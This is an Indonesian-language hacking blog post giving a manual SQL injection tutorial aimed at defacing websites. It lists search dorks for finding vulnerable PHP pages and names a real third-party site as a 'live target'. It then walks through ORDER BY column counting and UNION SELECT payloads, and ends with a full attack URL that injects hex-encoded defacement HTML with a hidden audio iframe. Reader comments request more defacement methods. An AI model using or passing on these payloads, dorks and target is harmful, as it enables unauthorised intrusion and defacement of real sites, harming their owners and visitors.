. SQL INJECT SQL INJECT - arif07 -->
Home Deface SQL-Chall SQL INJECT

SQL INJECT

Written By 2 Comments

Tutorial SQL Inject


Assalamualaikum wr.wb

Oke di postingan kali ini saya akan memberikan tutorial SQL inject manual menggunakan android ,tapi  ini SQL inject nya ngk nyari username sama pass website target ya ,hanya mencantumkan nama ,lagu dan foto saja .
Oke langsung saja ke tutorial nya 

Dork :
  • inurl:/detail_berita.php?id=
  • inurl:/umum.php?id=
  • inurl:/games.php?id=
  • inurl:/about.php?id=
  • inurl:/viewproduct.php?id=

http://www.jjhobby.com/viewproduct.php?id=9

Live target
  1. Kita dorking dulu dork di atas 
2.setelah kita dapat target kita coba cek target apakah vuln dengan SQL inject dengan cara menambah kan  '  di belakang nomor url web target contoh 
http://www.jjhobby.com/viewproduct.php?id=9'
Bila vuln tampilan nya akan jadi seperti ini 
Nah kira" gitu ,pokok nya ada eror my SQL apa eror SQL sytax ya gitu" deh 



3.kalo web target vuln kita lanjut masuk kan exploit nya yaitu :

 Tambahin +order+by+1--



+order+by+2--



~~~~~~~~3--



~~~~~~~~4--

Dan seterusnya 
Sampai ketemu eror 
Gw eror di angka 11 berarti jumlah colomn nya ada 10

4.setalah kita tau jumlah colomn nya lanjut kita masukin exploit berikut nya yaitu 



+union+select+1,2,3,4,5,6,7,8,9,10--

Angka yg di belakang itu sesuai jumlah colomn nya ya ,jangan lupa tambahi - di depan nomor id nya misal id=9 jadi id=-9

Dan hasil nya 

Yang gw lingkarin itu adalah angka ajaib nya 


5.saya pilih angka 2 ,lanjut kita inject angka /web nya
Kita kunjungi dulu web ini untuk hek code html nya Disini

Misal ini code html kalian:

<center><img class="rotate" src="https://4.top4top.net/p_129460x4i0.jpg" height="400px" width="400px"><br>INJECTED BY PcT•Mr.Pemula & My Teacher MR.CRUNCH<br><iframe width="0" height="0" src="https://5.top4top.net/m_13214tzi60.mp3"
frameborder="0" allowfullscreen></iframe>
<style type="text/css">
.rotate {
animation-name: rotate ;
animation-duration: 5s;
animation-play-state: running;
animation-timing-function: linear;
animation-iteration-count: infinite;
opacity: 1.0;filter: alpha(opacity=50);
}
img:hover {
opacity: 1.0;
filter: alpha(opacity=100);
}
@keyframes rotate{
10% {transform:rotateY(36deg)}
20% {transform:rotateY(72deg)}
30% {transform:rotateY(108deg)}
40% {transform:rotateY(144deg)}
50% {transform:rotateY(180deg)}
60% {transform:rotateY(216deg)}
70% {transform:rotateY(252deg)}
80% {transform:rotateY(288deg)}
90% {transform:rotateY(324deg)}
100% {transform:rotateY(360deg)}
}
</style>
Nah lalu kalian copy code kalian itu dan paste di web di atas ,gini

Kemudian kalian klik tombol
Nah itu hasil nya 

6.setelah itu ,kalian masuk in code inject nya : 
+union+select+1,CONCAT(0xHASILHEXYGTADI),3,4,5,6,7,8,9,10--

Kata contact itu sesuai dengan colomn kalian yang tadi ,sesuai dengan angka ajaib nya . 0x itu harus di pake ya ,Jan di hapus 

Nih hasil gw Di sini
Dan ini hasil akhir link nya :

http://www.jjhobby.com/viewproduct.php?id=-9+union+select+1,CONCAT(0x3C63656E7465723E3C696D6720636C6173733D22726F7461746522207372633D2268747470733A2F2F342E746F7034746F702E6E65742F705F313239343630783469302E6A706722206865696768743D223430307078222077696474683D223430307078223E3C62723E494E4A45435445442042592050635420224D722E50656D756C612026204D792054656163686572204D522E4352554E43483C62723E3C696672616D652077696474683D223022206865696768743D223022207372633D2268747470733A2F2F352E746F7034746F702E6E65742F6D5F3133323134747A6936302E6D7033220D0A6672616D65626F726465723D22302220616C6C6F7766756C6C73637265656E3E3C2F696672616D653E0D0A3C7374796C6520747970653D22746578742F637373223E0D0A2E726F74617465207B0D0A616E696D6174696F6E2D6E616D653A20726F74617465203B0D0A616E696D6174696F6E2D6475726174696F6E3A2035733B0D0A616E696D6174696F6E2D706C61792D73746174653A2072756E6E696E673B0D0A616E696D6174696F6E2D74696D696E672D66756E6374696F6E3A206C696E6561723B0D0A616E696D6174696F6E2D697465726174696F6E2D636F756E743A20696E66696E6974653B0D0A6F7061636974793A20312E303B66696C7465723A20616C706861286F7061636974793D3530293B0D0A7D0D0A696D673A686F766572207B0D0A6F7061636974793A20312E303B0D0A66696C7465723A20616C706861286F7061636974793D313030293B0D0A7D0D0A406B65796672616D657320726F746174657B0D0A313025207B7472616E73666F726D3A726F7461746559283336646567297D0D0A323025207B7472616E73666F726D3A726F7461746559283732646567297D0D0A333025207B7472616E73666F726D3A726F746174655928313038646567297D0D0A343025207B7472616E73666F726D3A726F746174655928313434646567297D0D0A353025207B7472616E73666F726D3A726F746174655928313830646567297D0D0A363025207B7472616E73666F726D3A726F746174655928323136646567297D0D0A373025207B7472616E73666F726D3A726F746174655928323532646567297D0D0A383025207B7472616E73666F726D3A726F746174655928323838646567297D0D0A393025207B7472616E73666F726D3A726F746174655928333234646567297D0D0A31303025207B7472616E73666F726D3A726F746174655928333630646567297D0D0A7D0D0A3C2F7374796C653E),3,4,5,6,7,8,9,10--
Dan hasil inject  nya 


Oke sekian dulu dari saya ,bila ada pertanyaan bisa coment di bawah atau hubungi Saya 


Waalaikumsalam wr.wb


Spesial thanks to PcT•Mr.crunch



logo
[Les't learn networking and programming]
  • WhatsApp
  • Instagram

    • Subscribe Our Newsletter

    Related Posts

    Buka Komentar
    Tutup Komentar

    2 Responses to "SQL INJECT"

    AdestaHaxor said...

    Next requests deface metode lokopedia😚

    August 18, 2019 at 7:10 PM delete
    Govind Geek said...

    Great information. Thank you so much for sharing it with us. You can try this.xor decoder

    January 13, 2021 at 3:05 PM delete

    Post a Comment

    Subscribe to: Post Comments (Atom)

    Iklan Atas Artikel

    loading...

    Iklan Tengah Artikel 1

    Iklan Tengah Artikel 2

    Iklan Bawah Artikel